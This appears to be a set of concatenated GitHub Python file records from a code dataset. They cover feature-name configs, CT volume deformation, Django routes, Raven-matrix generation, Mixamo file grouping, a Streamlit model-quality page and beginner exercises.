'user_eb_self_use_fre', 'user_vg_buy_fre',\n 'user_lt_buy_fre', 'user_address_change_fre')\n\"\"\"\n通话信息字段表\n\n\"\"\"\nUSER_CONTACT_COLUMNS = ('call_cnt', 'call_in_cnt', 'call_out_cnt', 'contact_1m', 'contact_1w', 'contact_3m',\n 'contact_3m_plus', 'contact_afternoon', 'contact_early_morning', 'contact_holiday',\n 'contact_morning', 'contact_night', 'contact_noon', 'contact_weekday', 'contact_weekend')\n\nUSER_CONTACT_RESULT = ('call', 'call_in', 'call_out', 'contact_p1m', 'contact_p1w', 'contact_p3m', 'contact_po3m',\n 'contact_afternoon', 'contact_early_morning', 'contact_holiday', 'contact_morning',\n 'contact_night', 'contact_noon', 'contact_weekday', 'contact_weekend')\n\n\nCHINA_LOC = ('HD', 'HN', 'HZ', 'HB', 'XB', 'XN', 'DB', 'GAT')\n\nCONTACT_REGION = (u'region_avg_call_in_time', u'region_avg_call_out_time', u'region_call_in_cnt',\n u'region_call_in_cnt_pct', u'region_call_in_time', u'region_call_in_time_pct',\n u'region_call_out_cnt', u'region_call_out_cnt_pct', u'region_call_out_time',\n u'region_call_out_time_pct', u'region_uniq_num_cnt')\n\nCELL_BEHAVIOR = (u'cpc_call_cnt_p6m', u'cpc_avg_call_cnt_p6m',\n u'cpc_call_in_cnt_p6m', u'cpc_avg_call_in_cnt_p6m',\n u'cpc_call_out_cnt_p6m', u'cpc_avg_call_out_cnt_p6m',\n u'cpc_call_in_time_p6m', u'cpc_avg_call_in_time_p6m',\n u'cpc_call_out_time_p6m', u'cpc_avg_call_out_time_p6m',\n u'cpc_net_flow_p6m', u'cpc_avg_net_flow_p6m', u'cpc_sms_cnt_p6m',\n u'cpc_avg_sms_cnt_p6m', u'cpc_call_cnt_p3m',\n u'cpc_avg_call_cnt_p3m', u'cpc_call_in_cnt_p3m',\n u'cpc_avg_call_in_cnt_p3m', u'cpc_call_out_cnt_p3m',\n u'cpc_avg_call_out_cnt_p3m', u'cpc_call_in_time_p3m',\n u'cpc_avg_call_in_time_p3m', u'cpc_call_out_time_p3m',\n u'cpc_avg_call_out_time_p3m', u'cpc_net_flow_p3m',\n u'cpc_avg_net_flow_p3m', u'cpc_sms_cnt_p3m', u'cpc_avg_sms_cnt_p3m',\n u'cpc_call_cnt_p2m', u'cpc_avg_call_cnt_p2m', u'cpc_call_in_cnt_p2m',\n u'cpc_avg_call_in_cnt_p2m', u'cpc_call_out_cnt_p2m',\n u'cpc_avg_call_out_cnt_p2m', u'cpc_call_in_time_p2m',\n u'cpc_avg_call_in_time_p2m', u'cpc_call_out_time_p2m',\n u'cpc_avg_call_out_time_p2m', u'cpc_net_flow_p2m',\n u'cpc_avg_net_flow_p2m', u'cpc_sms_cnt_p2m', u'cpc_avg_sms_cnt_p2m',\n u'cpc_call_cnt_p1m', u'cpc_call_in_cnt_p1m', u'cpc_call_out_cnt_p1m',\n u'cpc_call_in_time_p1m', u'cpc_call_out_time_p1m', u'cpc_net_flow_p1m',\n u'cpc_sms_cnt_p1m')\n\nTRIP_INFO_RESULT = (\n u'cpc_trip_long_tsp', u'cpc_trip_his_cnt',\n u'cpc_trip_his_total_days', u'cpc_trip_his_avg_days',\n u'cpc_trip_his_tll_cnt', u'cpc_trip_his_tdl_cnt',\n u'cpc_trip_his_fp_pct', u'cpc_trip_his_fp_total_cnt',\n u'cpc_trip_his_fp_total_cnt_ratio', u'cpc_trip_his_fet_tsp',\n u'cpc_trip_his_let_tsp', u'cpc_trip_holiday_total_pct',\n u'cpc_trip_holiday_total_pct_ratio', u'cpc_trip_holiday_days_cnt',\n u'cpc_trip_holiday_avg_days', u'cpc_trip_holiday_days_cnt_ratio',\n u'cpc_trip_weekend_total_pct', u'cpc_trip_weekend_total_pct_ratio',\n u'cpc_trip_weekend_days_cnt', u'cpc_trip_weekend_avg_days',\n u'cpc_trip_weekend_days_cnt_ratio', u'cpc_trip_workday_total_pct',\n u'cpc_trip_workday_total_pct_ratio', u'cpc_trip_workday_days_cnt',\n u'cpc_trip_workday_avg_days', u'cpc_trip_workday_days_cnt_ratio',\n u'cpc_trip_tll_esb_pct', u'cpc_trip_tll_esb_total_days',\n u'cpc_trip_tdl_esb_pct', u'cpc_trip_tdl_esb_total_days',\n u'cpc_trip_tll_esm_pct', u'cpc_trip_tll_esm_total_days',\n u'cpc_trip_tdl_esm_pct', u'cpc_trip_tdl_esm_total_days',\n u'cpc_trip_tll_esb_pct_ratio', u'cpc_trip_tll_esb_total_days_ratio',\n u'cpc_trip_tdl_esb_pct_ratio', u'cpc_trip_tdl_esb_total_days_ratio',\n u'cpc_trip_tll_esm_pct_ratio', u'cpc_trip_tll_esm_total_days_ratio',\n u'cpc_trip_tdl_esm_pct_ratio', u'cpc_trip_tdl_esm_total_days_ratio')\n\nORG_TYPE = (\n u'租车', u'招聘', u'房地产', u'电商', u'银行', u'运营商', u'支付', u'投资理财', u'贷款', u'汽车', u'个人',\n u'健身', u'互联网', u'投资担保', u'贷款/融资', u'保险', u'短号', u'基金', u'旅游出行', u'快递', u'APP软件',\n u'政府机构', u'婚庆'\n)\n\nORG_RESULT = ('crt', 'rec', 'res', 'eb', 'bank', 'opt', 'pay', 'iaf', 'loan', 'car', 'ps',\n 'gym', 'net', 'ig', 'lof', 'ins', 'sn', 'fund', 'trv', 'exp', 'app', 'gov', 'wed')\n\nSERVICE_TIME_TAGS = ('p1m', 'p2m', 'p3m')\n\nSR_0 = ['cpc_ser_%s_cnt' % i for i in ORG_RESULT]\nSR_1 = ['cpc_ser_%s_org_cnt' % i for i in ORG_RESULT]\nSR_2 = ['cpc_ser_%s_cnt_%s' % (k, v) for k in ORG_RESULT for v in SERVICE_TIME_TAGS]\nSR_3 = ['cpc_ser_%s_org_cnt_%s' % (k, v) for k in ORG_RESULT for v in SERVICE_TIME_TAGS]\nSR_4 = ['cpc_ser_%s_cnt_ratio_%s' % (k, v) for k in ORG_RESULT for v in SERVICE_TIME_TAGS]\nSR_5 = ['cpc_ser_%s_cnt_ratio' % i for i in ORG_RESULT]\nSR_6 = ['cpc_avg_ser_%s_cnt_p3m' % i for i in ORG_RESULT]\nSR_B = ['cpc_total_ser_cnt_%s', 'cpc_total_ser_org_cnt_%s', 'cpc_total_ser_org_type_cnt_%s']\nSR_7 = [k % v for k in SR_B for v in SERVICE_TIME_TAGS]\nS = ('cpc_total_ser_cnt', 'cpc_total_ser_org_cnt', 'cpc_total_ser_org_type_cnt')\nSERVICE_RESULT = S + tuple(SR_0) + tuple(SR_1) + tuple(SR_2) + tuple(SR_3) + tuple(SR_4) + tuple(SR_5) + tuple(SR_6) + \\\n tuple(SR_7)\n\n# cpc_total_ser_cnt_p1m\n# cpc_total_ser_org_cnt_p1m\n# cpc_total_ser_org_type_cnt_p1m\n#\n# cpc_total_ser_cnt_p2m\n# cpc_total_ser_org_cnt_p2m\n# cpc_total_ser_org_type_cnt_p2m\n#\n# cpc_total_ser_cnt_p3m\n# cpc_total_ser_org_cnt_p3m\n# cpc_total_ser_org_type_cnt_p3m\n\n\n\n","repo_name":"lengqingxiao/Honey","sub_path":"honeybee_dev_5.0/gauss/config/global_config.py","file_name":"global_config.py","file_ext":"py","file_size_in_byte":9806,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"40319011551","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Sep 16 13:58:20 2022\n\n@author: mgar5380\n\"\"\"\n#External Modules\nimport os\nimport json\nimport SimpleITK as sitk\nfrom pathlib import Path\n\n#Platipy Modules\nfrom platipy.dicom.io.crawl import process_dicom_directory\nfrom platipy.dicom.io.nifti_to_rtstruct import convert_nifti\nfrom platipy.dicom.io.nifti_to_series import convert_nifti_to_dicom_series\n\n#CTHeadDeformation Modules\nfrom DeformHeadCT.DataPreparation import (\n MoveDCMFiles,\n GetPointOfRotation\n )\n\n\"\"\"\nTODO\nAdd more input checking options\nAdd gaussian smoothing option for both head rotation and GTV shift\n\"\"\"\n\nclass VolumeDeformation:\n \n def __init__(self,InfoFile = '',patient_id = '',patientunderscore = '',axes = [],angles = [],\n InputDir = '',StructDir = '',OutputDir = '/Output',nifti_directory = '/temp',Structure_Shift = '',\n Structure_Names = '',coordinates_cutoff = [], VertDict = {}, verbose=True):\n '''\n\n Parameters\n ----------\n InfoFile : str, optional\n The file location of the .json file containing the information about the volume being deformed. If empty variables need to be \n manually entered. If InfoFile is not empty all initial variables are extracted from json file. The default is ''.\n patient_id : str, optional\n patient id as described by the dicom file. The default is ''.\n patientunderscore : str, optional\n patient_id but blank spaces are replaced by underscores. If empty the patientunderscore will be genreated using patient_id. \n The default is ''.\n axes : array, optional\n nx3 array where the nth element is the axis around which the volume will rotate. See wiki for more info The default is [].\n angles : (float | arr), optional\n angles of rotation. If empty no head rotation will be done. The default is [].\n InputDir : str, optional\n Directory of the ct dicom files to be deformed. The default is ''.\n StructDir : str, optional\n Location of the STRUCT dicom file. The default is ''.\n OutputDir : str, optional\n Directory where the dicom values of the deformed CT will be written to. The default is '/Output'.\n nifti_directory : str, optional\n Location of the temp directory where temporary files will be written to. The default is '/temp'.\n Structure_Shift : array, optional\n 1x3 array describing the magnitude of the rigid displacement of the structures in \"Structure_Names\". The default is ''.\n Structure_Names : (str | array), optional\n The structures to be shifted. The default is ''.\n coordinates_cutoff : array, optional\n 2x3 array annotating the co-ordinates that seperate the head and the shoulders. See the wiki for more information. The default is [].\n VertDict : dict, optional\n Voxel location of the intervertebral gaps for the CT scan to be deformed. The default is {}.\n verbose : bool, optional\n If True all the warning messages will be displayed. Messages can be useful for debugging. If False no messages displayed.\n The default is True.\n\n Returns\n -------\n None.\n\n '''\n if InfoFile:\n if verbose:\n print('Defining volume parameters using input json file')\n \n #Read json file\n with open(InfoFile) as json_file:\n data = json.load(json_file) \n \n self.patient_id = data['name']\n \n self.patientunderscore = self.patient_id.replace('-','_').upper()\n \n if 'axes' in data:\n self.axes = data['axes']\n else:\n self.axes = ''\n\n if 'angles' in data:\n self.angles = data['angles']\n if 'coordinates_cutoff' in data:\n self.coordinates_cutoff = data['coordinates_cutoff']\n else:\n if verbose:\n print('No \"coordinates_cutoff\" variable detected')\n \n self.point_of_rotation = GetPointOfRotation(data)\n else:\n self.angles = ''\n if verbose:\n print('No Head Rotations detected, determined by \"angles\" variable') \n \n if 'InputDirectory' in data:\n self.InputDir = data['InputDirectory']\n else:\n if verbose:\n print('No \"InputDirectory\" variable detected in input json file')\n self.InputDir = -1 \n \n if 'OutputDirectory' in data:\n self.OutputDir = data['OutputDirectory']\n else:\n self.OutputDir = ''\n if verbose:\n print('No \"OutputDirectory\" variable detected in input json file')\n \n if 'TempDirectory' in data:\n self.nifti_directory = Path(data['TempDirectory']) \n else:\n self.nifti_directory = ''\n if verbose:\n print('No \"TempDirectory\" variable detected in input json file')\n \n if 'StructureFile' in data:\n self.StructDir = data['StructureFile']\n \n if 'Structure_Names' in data and 'Structure_Shift' in data:\n self.Structure_Names = data['Structure_Names']\n self.Structure_Shift = data['Structure_Shift']\n else:\n if verbose:\n print('Variable \"Structure_Names\" or \"Structure_Shift\" not provided')\n \n else:\n self.StructDir = ''\n if verbose:\n print('No \"StructureFile\" variable detected in Input Json File')\n\n else:\n if verbose:\n print('Defining volume parameters manually')\n \n self.patient_id = patient_id\n \n #If patientunderscore variable not entered then it can be created using patient_id\n if not patientunderscore:\n self.patientunderscore = self.patient_id.replace('-','_')\n else:\n self.patientunderscore = patientunderscore\n \n self.axes = axes\n self.angles = angles\n self.Structure_Shift = Structure_Shift\n self.coordinates_cutoff = coordinates_cutoff\n \n self.InputDir = InputDir\n self.StructDir = StructDir\n self.OutputDir = OutputDir\n self.nifti_directory = Path(nifti_directory)\n self.Structure_Names = Structure_Names\n \n data = {};\n data['axes'] = self.axes\n if 'Oc-C1' in VertDict:\n data['Oc-C1'] = VertDict['Oc-C1']\n if 'C1-C2' in VertDict:\n data['C1-C2'] = VertDict['C1-C2']\n if 'C2-C3' in VertDict:\n data['C2-C3'] = VertDict['C2-C3']\n #Other vertebrae added in case a more complex model gets used in the future but not needed\n if 'C3-C4' in VertDict:\n data['C3-C4'] = VertDict['C3-C4']\n if 'C4-C5' in VertDict:\n data['C4-C5'] = VertDict['C4-C5']\n if 'C5-C6' in VertDict:\n data['C5-C6'] = VertDict['C5-C6']\n if 'C6-C7' in VertDict:\n data['C6-C7'] = VertDict['C6-C7']\n \n self.point_of_rotation = GetPointOfRotation(data)\n \n # Create output and temporary directories if they don't already exist\n Path.mkdir(self.nifti_directory,parents=False, exist_ok=True)\n Path.mkdir(Path(self.OutputDir),parents=False, exist_ok=True) \n \n \n def PrepareDcmData(self):\n \n \"\"\"\n Put the dicom files into the format required by platipy, and convert the dicom files to nifti files. \n Nifti files stored in TempDirectory.\n \n \"\"\"\n \n #Move input dicom files into one folder \n input_dcm_dir = str(self.nifti_directory) + '/dicom'\n Path.mkdir(Path(input_dcm_dir),parents=False, exist_ok=True)\n \n #Create dicom/ct\n input_dcm_ct_dir = input_dcm_dir + '/ct'\n Path.mkdir(Path(input_dcm_ct_dir),parents=False, exist_ok=True)\n MoveDCMFiles(self.InputDir,input_dcm_ct_dir)\n \n #If Structure shift is required, move structure information into dicom/rtstruct\n if self.StructDir:\n input_dcm_struct_dir = input_dcm_dir + '/rtstruct'\n Path.mkdir(Path(input_dcm_struct_dir),parents=False, exist_ok=True)\n MoveDCMFiles(self.StructDir,input_dcm_struct_dir)\n \n #Convert from dicom volumes to nifti volumes. Should auto detect if there is or isn't a struct dir\n process_dicom_directory(input_dcm_dir,output_directory=self.nifti_directory,verbose=True)\n \n def WriteVolumesToFile(self,image_ct_deformed,structShiftFlag=0,deformed_structures = {}):\n \"\"\"\n Write the deformed ct volume and structures to dicom formats in the directory OutputDir\n\n Parameters\n ----------\n image_ct_deformed : SimpleITK.Image\n The deformed ct image.\n structShiftFlag : bool or int or whatever, optional\n If true the structures in deformed_structures flag will be written. If 0 then only the image_ct_deformed will be written\n deformed_structures : TYPE, optional\n DESCRIPTION. The default is {}.\n\n Returns\n -------\n None.\n\n \"\"\"\n #Define CT variables\n outputDirCT = Path(self.OutputDir + '/ct') \n outputDirCT.mkdir(exist_ok=True, parents=True)\n \n input_dcm_dir = str(self.nifti_directory) + '/dicom'\n \n #write deformed ct to dcm\n convert_nifti_to_dicom_series(\n image=image_ct_deformed,\n reference_dcm=input_dcm_dir + '/ct',\n output_directory=str(outputDirCT)\n ) \n \n if structShiftFlag:\n #Create a temporary directory to write the structures to\n TempDirStruct = Path(self.OutputDir + '/OutputStructures')\n TempDirStruct.mkdir(exist_ok=True, parents=True)\n \n #write structure to nifti format \n for struct in deformed_structures:\n sitk.WriteImage(deformed_structures[struct],str(TempDirStruct / str(struct + \".nii.gz\")))\n \n # rtstruct output dir \n output_dir_dcm_STRUCT = Path(self.OutputDir + '/rtstruct') \n output_dir_dcm_STRUCT.mkdir(exist_ok=True, parents=True)\n \n # dictionary containing path of nifti files\n masks = {}\n for m in os.listdir(TempDirStruct):\n name = m.split('.')[0]\n mask_path = str(TempDirStruct / m)\n masks[name] = mask_path \n \n #convert nifti files to struct file\n convert_nifti(\n dcm_path = str(outputDirCT / \"0.dcm\"),\n mask_input = masks, \n output_file = str(output_dir_dcm_STRUCT / \"struct.dcm\")\n ) \n","repo_name":"ACRF-Image-X-Institute/CTHeadDeformation","sub_path":"DeformHeadCT/VolumeInfo.py","file_name":"VolumeInfo.py","file_ext":"py","file_size_in_byte":11430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"14326967340","text":"from django.urls import path\nfrom rest_framework.routers import DefaultRouter\n\nfrom . import views\n\napp_name = 'microservice_requests'\n\nrouter = DefaultRouter()\n\nurlpatterns = [\n path('register-user/blog', views.ChatRegisterView.as_view(), name=\"blog\"),\n path('categories/blog/', views.CategoriesListView.as_view(), name=\"categories\"),\n path('categories/blog//', views.CategoryChangeView.as_view(), name=\"categories-slug\"),\n]\n\nurlpatterns += router.urls\n","repo_name":"Mikhail-Gorelov/chat_microservice","sub_path":"web/microservice_requests/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"17134396434","text":"from __future__ import annotations\nimport copy\nfrom dataclasses import dataclass, field\nfrom typing import List, Union, Dict, Set\nfrom enum import Enum, auto\n\nimport numpy as np\nfrom scipy.special import comb\n\nfrom .attribute import (AttributeType, Uniformity, Configuration, PositionType,\n AngularPosition, PlanarPosition)\nfrom .entity import Entity\n\n\nclass ComponentType(Enum):\n NONE = auto()\n LEFT = auto()\n RIGHT = auto()\n UP = auto()\n DOWN = auto()\n OUT = auto()\n IN = auto()\n\n\nclass LayoutType(Enum):\n CENTER = auto()\n GRID_FOUR = auto()\n GRID_FIVE = auto()\n GRID_NINE = auto()\n\n\n@dataclass\nclass PositionHistory:\n available: int\n sampled: List[Set[int]]\n\n\n@dataclass(init=False)\nclass AttributeHistory:\n number: List[int]\n position: Dict[int, PositionHistory]\n shape: List[int]\n size: List[int]\n color: List[int]\n angle: List[int]\n\n def __init__(self, constraints):\n self.number = []\n self.position = {}\n self.shape = []\n self.size = []\n self.color = []\n self.angle = []\n for i in range(constraints.number.min + 1, constraints.number.max + 2):\n self.position[i] = PositionHistory(available=comb(\n constraints.positions.shape[0], i),\n sampled=[])\n\n\n@dataclass\nclass Bounds:\n min: int\n max: int\n\n\n@dataclass\nclass Constraints:\n number: Bounds\n shape: Bounds\n size: Bounds\n color: Bounds\n angle: Bounds\n uniformity: Bounds\n position_type: PositionType\n positions: Union[List[AngularPosition], List[PlanarPosition]]\n\n def __post_init__(self):\n self.positions = np.array(self.positions)\n\n\n@dataclass\nclass Component:\n component_type: ComponentType\n layout_type: LayoutType\n constraints: Constraints\n config: Configuration = field(init=False)\n uniformity: Uniformity = field(init=False)\n history: AttributeHistory = field(init=False)\n entities: List[Entity] = field(init=False)\n initial_constraints: Constraints = field(init=False)\n\n def __post_init__(self):\n self.config = Configuration(self.constraints)\n self.uniformity = Uniformity(self.constraints)\n self.history = AttributeHistory(self.constraints)\n self.entities = []\n self.initial_constraints = copy.deepcopy(self.constraints)\n\n def setting_of(self, attr):\n return self.attr(attr).setting\n\n def attr(self, attr):\n return getattr(self.entity, attr.name.lower())\n\n @property\n def entity(self):\n return self.entities[0]\n\n def make_uniform(self, attr):\n setting = self.setting_of(attr)\n for entity in self.entities[1:]:\n entity_attr = getattr(entity, attr.name.lower())\n entity_attr.setting = setting\n\n def set_uniform(self, attr, setting):\n for entity in self.entities:\n entity_attr = getattr(entity, attr.name.lower())\n entity_attr.setting = setting\n\n def set_position(self):\n for entity, bbox in zip(self.entities, self.config.position.value):\n entity.bbox = bbox\n\n def sample(self,\n sample_position=False,\n sample_number=False,\n carryover=True,\n uniform=None):\n if sample_position or sample_number:\n if sample_number:\n self.config.number.sample(self.constraints)\n self.config.position.sample(self.config.number.value)\n if uniform is None:\n uniform = self.uniformity.value\n if uniform:\n if len(self.entities) > 0 and carryover:\n self.entities = [self.entities[0]]\n else:\n self.entities = [\n Entity(name=str(0),\n bbox=self.config.position.value[0],\n constraints=self.constraints)\n ]\n for i, bbox in enumerate(self.config.position.value[1:]):\n entity = copy.deepcopy(self.entities[0])\n entity.name = str(i)\n entity.bbox = bbox\n self.entities.append(entity)\n else:\n self.entities = [\n Entity(name=str(i), bbox=bbox, constraints=self.constraints)\n for i, bbox in enumerate(self.config.position.value)\n ]\n\n def sample_unique(self, attr, history, initial_constraints):\n if attr is AttributeType.NUMBER:\n self.config.sample_unique(initial_constraints,\n history,\n inplace=True)\n self.sample(carryover=False)\n elif attr is AttributeType.POSITION:\n self.config.position.sample_unique(self.config.number.value,\n history,\n inplace=True)\n self.set_position()\n elif attr is AttributeType.ANGLE or \\\n attr is AttributeType.UNIFORMITY:\n raise ValueError(f\"unsupported operation attribute: {attr!s}\")\n elif attr in AttributeType:\n if self.uniformity.value:\n self.attr(attr).sample_unique(initial_constraints,\n history,\n inplace=True)\n self.make_uniform(attr)\n else:\n for entity in self.entities:\n entity_attr = getattr(entity, attr.name.lower())\n entity_attr.sample_unique(initial_constraints,\n history,\n inplace=True)\n else:\n raise ValueError(\"unsupported operation\")\n\n\ndef make_component(component_type, layout_type, position_type, positions, *,\n number_min, number_max, shape_min, shape_max, size_min,\n size_max, color_min, color_max, angle_min, angle_max,\n uniformity_min, uniformity_max):\n return Component(component_type=component_type,\n layout_type=layout_type,\n constraints=Constraints(number=Bounds(min=number_min,\n max=number_max),\n shape=Bounds(min=shape_min,\n max=shape_max),\n size=Bounds(min=size_min,\n max=size_max),\n color=Bounds(min=color_min,\n max=color_max),\n angle=Bounds(min=angle_min,\n max=angle_max),\n uniformity=Bounds(\n min=uniformity_min,\n max=uniformity_max),\n position_type=position_type,\n positions=positions))\n","repo_name":"shlomenu/raven-gen","sub_path":"src/raven_gen/component.py","file_name":"component.py","file_ext":"py","file_size_in_byte":7263,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"150182975","text":"import os\nimport argparse\nimport pdb\n\n\ndef makedir(folder):\n if not os.path.isdir(folder):\n os.makedirs(folder)\n\naction_class = {'air squat bent arms': 'squat',\n 'air squat': 'squat',\n 'baseball hit': 'hit',\n 'baseball strike': 'hit',\n 'baseball pitching (1)': 'pitch',\n 'baseball pitching': 'pitch',\n 'cheering while sitting (1)': 'cheer',\n 'cheering while sitting': 'cheer',\n 'clapping (1)': 'clap',\n 'clapping': 'clap',\n 'climbing (1)': 'climb',\n 'climbing': 'climb',\n 'crouch walk left': 'crossstep',\n 'standing walk left': 'crossstep',\n 'hook': 'hook',\n 'hook punch': 'hook',\n 'jumping': 'jump',\n 'standing jump': 'jump',\n 'kicking': 'kick',\n 'roundhouse kick': 'kick',\n 'kneeing soccerball (1)': 'knee',\n 'kneeing soccerball': 'knee',\n 'pick fruit (1)': 'pick',\n 'pick fruit': 'pick',\n 'prone roll': 'roll',\n 'roll left': 'roll',\n 'running': 'run',\n 'treadmill running': 'run',\n 'stall soccerball': 'stall',\n 'stall soccerball (1)': 'stall',\n 'start walking (1)': 'walk',\n 'start walking': 'walk',\n 'waving (1)': 'wave',\n 'waving': 'wave',\n 'zombie stand up (1)': 'standup',\n 'zombie stand up': 'standup',\n 'quick formal bow': 'bow',\n 'quick informal bow': 'bow',\n 'push start': 'push',\n 'push stop': 'push',\n }\n\nappearance = {}\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--input_path', type=str, help='the path of downloaded models')\n parser.add_argument('--output_path', type=str, help='the path of grouped models, one level above the actor name')\n args = parser.parse_args()\n\n for file in os.listdir(args.input_path):\n if file.endswith('.fbx'):\n # separate the actor and action name, e.g. swat@Air Squat Bent Arms.fbx\n tokens = file.split('.')[0].split('@')\n # get the actor name\n actor = tokens[0].lower()\n # get the action name\n action = tokens[1].lower()\n action_clss = action_class.get(action, None)\n file = file.replace(' ', '\\ ').replace('(', '\\(').replace(')', '\\)')\n file_path = os.path.join(args.input_path, file)\n if action_clss is None:\n\n os.system('rm %s' % file_path)\n else:\n actor_appearance = appearance.get(actor, {})\n actor_appearance[action] = actor_appearance.get(action, 0) + 1\n appearance[actor] = actor_appearance\n output_dir = os.path.join(args.output_path, actor, action_clss)\n makedir(output_dir)\n os.system('cp %s %s' % (file_path, output_dir))\n\n for actor in appearance.keys():\n for action in action_class.keys():\n if action not in appearance[actor].keys():\n print('For actor \\'%s\\', actor \\' %s \\' is missing' % (actor, action))\n\n\nif __name__ == '__main__':\n main()","repo_name":"sunxm2357/TwoStreamVAN","sub_path":"preprocess/Mixamo/group.py","file_name":"group.py","file_ext":"py","file_size_in_byte":3428,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"18"} +{"seq_id":"26420803748","text":"import streamlit as st\nfrom pandera.typing import DataFrame\n\nfrom encord_active.app.common.components.prediction_grid import prediction_grid\nfrom encord_active.app.common.state import get_state\nfrom encord_active.lib.charts.histogram import get_histogram\nfrom encord_active.lib.common.colors import Color\nfrom encord_active.lib.model_predictions.map_mar import (\n PerformanceMetricSchema,\n PrecisionRecallSchema,\n)\nfrom encord_active.lib.model_predictions.reader import (\n LabelMatchSchema,\n PredictionMatchSchema,\n)\n\nfrom . import ModelQualityPage\n\n\nclass FalsePositivesPage(ModelQualityPage):\n title = \"🌡 False Positives\"\n\n def sidebar_options(self):\n self.prediction_metric_in_sidebar()\n self.row_col_settings_in_sidebar()\n\n def build(\n self,\n model_predictions: DataFrame[PredictionMatchSchema],\n labels: DataFrame[LabelMatchSchema],\n metrics: DataFrame[PerformanceMetricSchema],\n precisions: DataFrame[PrecisionRecallSchema],\n ):\n metric_name = get_state().predictions.metric_datas.selected_predicion\n if not metric_name:\n st.error(\"No prediction metric selected\")\n return\n\n st.markdown(f\"# {self.title}\")\n color = Color.RED\n with st.expander(\"Details\"):\n st.markdown(\n f\"\"\"### The view\nThese are the predictions for which either of the following is true\n1. The IOU between the prediction and the best matching label was too low\n2. There was another prediction with higher model confidence which matched the label already\n3. The predicted class didn't match\n\n---\n\n**Color**:\nThe {color.name.lower()} boxes marks the false positive predictions.\nThe remaining colors correspond to the dataset labels with the colors you are used to from the label editor.\n\"\"\",\n unsafe_allow_html=True,\n )\n self.metric_details_description()\n\n fp_df = model_predictions[model_predictions[PredictionMatchSchema.is_true_positive] == 0.0].dropna(\n subset=[metric_name]\n )\n if fp_df.shape[0] == 0:\n st.write(\"No false positives\")\n else:\n histogram = get_histogram(fp_df, metric_name)\n st.altair_chart(histogram, use_container_width=True)\n prediction_grid(get_state().project_paths.data, model_predictions=fp_df, box_color=color)\n","repo_name":"feemthan/encord-active","sub_path":"src/encord_active/app/model_quality/sub_pages/false_positives.py","file_name":"false_positives.py","file_ext":"py","file_size_in_byte":2529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"18"} +{"seq_id":"5121765822","text":"if __name__ == \"__main__\":\n kebabs = ['meat', 'vegetable', 'falafel']\n\n for kebab in kebabs:\n if kebab == 'falafel':\n print(kebab.upper())\n else:\n print(kebab.title())\n\n liked_food = 'chicken tikka masala'\n\n if liked_food == 'Pasta':\n print(\"Ew, that's disgusting\")\n else:\n print(\"sheesh\")\n\n\n age = 70\n if age >= 50:\n print(\"\\nYou are old, you sad sad soul.\")\n else:\n print(\"\\nYou are one young bean!\")\n\n\n nut_mix = ['almonds', 'walnuts', 'peanuts']\n\n for nut in nut_mix:\n print(f\"\\nAdding {nut}.\")\n print(\"\\nFinished making your nut bowl. Come again to Nut and Co!\")\n\n\n nutz_mix = ['walnuts', 'peanuts']\n\n wanted_nuts = ['kebab nut']\n\n for wanted_nut in wanted_nuts:\n if wanted_nut in nutz_mix:\n print(f\"\\nAdding {wanted_nut}.\")\n else:\n print(f\"\\n\\nSorry, but we don't have your wanted {wanted_nut}.\")\n\n print(\"\\nWe finished making your nut mix. Come again soon.\")\n\n\n def measure_age(age):\n if age > 70:\n print(\"\\nOLD\")\n elif age < 30:\n print(\"\\nYOUNG\")\n else:\n print(\"\\nmeduim\")\n\n measure_age(35)\n measure_age(45)\n measure_age(75)\n measure_age(25)","repo_name":"IllusoryPig/VariablesAndDataTypes","sub_path":"ChapterFive.py","file_name":"ChapterFive.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"26189122045","text":"'''\n\nGiven an array of integers A, of size N.\n\nReturn the maximum size subarray of A having only non-negative elements. \nIf there are more than one such subarray, return the one having the smallest starting index in A.\n\n'''\ndef solve(A):\n count = 0\n for i in range(len(A)):\n if A[i] == 1:\n count += 1\n if count == len(A):\n return A\n \n max_len = 0\n min_index = 0\n for i in range(len(A)):\n # print(\"A[i] \",A[i],i)\n if A[i] > 0:\n length = 0\n for j in range(i,len(A)):\n if A[j] > 0:\n length += 1 \n\n if A[j] < 0:\n length = 0\n\n break\n # print(length)\n if max_len < length:\n max_len = length\n min_index = i\n # print(\"max len min_index\",max_len,min_index)\n \n return A[min_index:max_len+i]\n\n# A = [5, 6, -1, 7, 8,9]\n# print(solve(A))\n\n","repo_name":"chinuteja/SCALER","sub_path":"MODULE-2/Arrays/Maximum positivity.py","file_name":"Maximum positivity.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"27955583174","text":"from django.core.management.base import BaseCommand, CommandError\nfrom cardhandler.models import Card\nimport json\n\n\n# card_data = dict()\n# with open(\"oracle-cards-20211007090329.json\", \"r+\") as j:\n# card_data = json.load(j)\n# # breakpoint()\n# print(card_data[0])\n\n\nclass Command(BaseCommand):\n help = 'bootstrap to populate dropdown'\n\n def handle(self, *args, **options):\n cards = Card.objects.all()\n cards.delete()\n\n with open(\"oracle-cards-20211007090329.json\", \"r+\") as j:\n card_data = json.load(j)\n\n # breakpoint()\n # print(card_data[0])\n broken_list = []\n for card_dict in card_data:\n if card_dict.get('arena_id') or 'arena' in card_dict['games']:\n images = card_dict.get(\"image_uris\")\n small_url = \"\"\n normal_url = \"\"\n art_crop_url = \"\"\n\n alt_small_url = \"\"\n alt_normal_url = \"\"\n alt_art_crop_url = \"\"\n if images:\n images = dict(images)\n if images:\n small_url = images.get(\"small\")\n normal_url = images.get(\"normal\")\n art_crop_url = images.get(\"art_crop\")\n\n if card_dict.get('layout') == \"modal_dfc\":\n card_dict['name'] = card_dict.get('card_faces')[\n 0].get('name')\n images = 